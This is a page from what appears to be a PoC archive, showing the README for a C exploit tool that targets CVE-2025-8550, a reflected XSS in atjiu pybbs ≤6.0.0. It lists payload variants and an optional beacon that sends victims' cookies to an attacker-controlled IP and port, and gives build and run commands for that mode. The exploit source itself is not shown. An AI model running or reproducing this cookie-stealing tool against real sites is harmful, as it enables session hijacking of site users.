Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2025-8550 PoC — atjiu pybbs list cross site scripting

Source
Associated Vulnerability
Title:atjiu pybbs list cross site scripting (CVE-2025-8550)
Description:A vulnerability was found in atjiu pybbs up to 6.0.0. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file /admin/topic/list. The manipulation of the argument Username leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The patch is named 2fe4a51afbce0068c291bc1818bbc8f7f3b01a22. It is recommended to apply a patch to fix this issue.
Description
 XSS exploit for CVE-2025-8550 in atjiu pybbs ≤6.0.0 
Readme
# CVE-2025-8550 – atjiu pybbs XSS Exploit

## Description

This repository hosts an automated Proof-of-Concept (PoC) exploit for **CVE-2025-8550**, a reflected Cross‑Site Scripting (XSS) vulnerability in **atjiu pybbs** (≤ v6.0.0). It targets the `/admin/topic/list` endpoint’s `username` parameter, which lacks proper input sanitization.

## Features

* **20+ Payload Variations:** script, SVG, iframe, object, onerror handlers and more.
* **Automatic URL Encoding:** ensures safe injection via libcurl’s `curl_easy_escape`.
* **Cookie Exfiltration (Optional):** beacon injection to send `document.cookie` to an attacker‑controlled server.
* **Multithreading:** uses pthreads to parallelize attempts and speed up testing.
* **Customizable CLI:** powered by `argparse`, supports specifying:

  * Target URL (`-u` / `--url`)
  * Cookie file for authenticated requests (`-c` / `--cookies`)
  * Enable cookie payload (`-k` / `--cokpay`)
  * Attacker server IP/port (`-i` / `--ip`, `-p` / `--port`)
  * Verbose logging (`-v` / `--verbose`)

## References

* **NVD:** [CVE-2025-8550](https://nvd.nist.gov/vuln/detail/CVE-2025-8550)

## Build & Usage

```
# Compile the exploit binary
gcc exploit.c argparse.c -o CVE-2025-8550 -lcurl -lpthread 

# Run against target
./CVE-2025-8550 -u http://<TARGET> -v [-c [COOKIE_FILE]]

#COOKIE SEND :
./CVE-2025-8550 -u http://TARGET -i <YOUR_IP> -p <YOUR_PORT> -v [VERBOSE_MODE] -k [PAYLOAD_COOKIE]
```

* Replace `http://<TARGET>` with your instance of atjiu pybbs.
* Use `-k` to enable the cookie‑stealing beacon (requires `-i` and `-p`).
* Omit `-c` if no authentication cookies are needed.

## References :
- NVD Entry : https://nvd.nist.gov/vuln/detail/CVE-2025-8550


## License :

MIT License


File Snapshot

[4.0K] /data/pocs/46b2c1f07a0cbfe5b640423ef56440431a036823 ├── [ 24K] exploit.c ├── [1.0K] LICENSE └── [1.8K] README.md 0 directories, 3 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →